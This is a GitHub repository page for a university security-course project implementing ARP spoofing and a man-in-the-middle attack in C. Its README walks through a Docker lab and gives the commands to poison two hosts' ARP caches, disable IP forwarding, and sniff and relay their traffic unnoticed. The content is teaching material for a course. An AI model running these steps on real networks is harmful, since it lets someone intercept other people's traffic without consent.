Skip to content
/ mitm Public

BUET UGCSE406 Project: ARP spoofing and man-in-the-middle attack

Notifications You must be signed in to change notification settings

3N4N/mitm

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

40 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

Man in the Middle Attack

A project for BUET security course UGCSE406.

This repository contains an implementation of Man in the Middle attack in C. The directory spoofer/ contains the codes related to ARP poisoning and sniffer/ contains the codes related to sniffing and relaying the packets.

How to run

Setting up hosts

First, you'll need two hosts in your network. For the hosts I used docker containers, whose configuration is stored in ./labsetup/docker-compose.yml. The compose file is configured according to my personal use case, so you'll have to read through it and change necessary parts (specially volumes section for Host M).

Host Name IP Address MAC Address
Host A 10.9.0.5 02:42:0a:09:00:05
Host B 10.9.0.6 02:42:0a:09:00:06
Host M 10.9.0.105 02:42:0a:09:00:69

Here are some useful aliases and commands to make the experience of using docker a breezier. Put the following codeblock in your bashrc.

alias dcbuild='docker-compose build'
alias dcup='docker-compose up'
alias dcdown='docker-compose down'
alias dockps='docker ps --format "{{.ID}}  {{.Names}}"'
docksh() { docker exec -it $1 /bin/bash; }

Starting communication

This project can handle both ICMP and TCP protocl. (Handling UDP protocol are in the plan for future.) So, first you'll want to set up a ICMP or TCP communication between two hosts in your network. Use ping for ICMP and nc for TCP.

The following codeblock is an example of setting up a ICMP communication between Host-A and Host-B.

# At Host-A
ping 10.9.0.6 # where 10.9.0.6 is the IP address of Host-B

# At Host-B
tcpdump -i eth0 -n icmp

And the codeblock below is an example of similar communication but with TCP protocol.

# On Host-B (server, IP address is 10.9.0.6)
nc -lp 9090

# On Host-A (client)
nc 10.9.0.6 9090

In both these cases, it looks like Host-A is the sender and Host-B is the receiver, but actually both hosts are sending and receiving packets simultaneously, so we'll have to poison both their ARP caches and relay both of the hosts' packets to each other.

Building the project

A makefile exists at the project root folder, which in turn invokes the makefiles for each of the two programs in spoofer/ and sniffer/. The makefiles are specifically crafted for Linux, so you'll have to figure out a building mechanism if you're in Windows or MacOS.

ARP poisoning

In order to launch a mitm attack, we'll first have to poison the ARP caches of both the hosts. To do that simply run the following command from the project directory.

# binary_file   Host-A   Host-B   Interface
./spoofer/spoof 10.9.0.5 10.9.0.6 eth0

The spoofer will then repeatedly send ARP replies to Host-A and Host-B claiming that Host-M (the attacker) is Host-B and Host-A respectively. So, when Host-A sends a packet to Host-B, or when Host-B sends one to Host-A, it'll arrive at Host-M.

Sniff and Relay

Now that we've successfully poisoned the ARP caches of the victim hosts, we'll need to sniff the incoming packets and relay them back to their intended target, so that the victims will not know they have been attacked.

Before launching the sniffer, remember to turn IP forwarding off. Normally, you'd turn it on because it would automatically relay the sniffed packets to their target, but that will also send an additional ARP reply with actual MAC addresses of the hosts which will clash with our ARP spoofing. So, we'll have to relay the packets ourselves.

# Turn IP forwarding off
sysctl net.ipv4.ip_forward=0

# Turn IP forwarding on
sysctl net.ipv4.ip_forward=1

After turning the IP forwarding off, you can now launch the sniffer, which will sniff the packets and log them down in a file named snifflog and then relay the packets to their intended target.

Note The sniffer doesn't take input. It reads from a file generated by the spoofer. If the sniffer can't find file ipmacinfo, ensure you launched the spoofer from root folder with ./spoofer/spoof and not with cd spoofer/ && ./spoof

./sniffer/sniff

Acknowledgments

This project would not have been completed without the following resources:

About

BUET UGCSE406 Project: ARP spoofing and man-in-the-middle attack

Resources

Stars

Watchers

Forks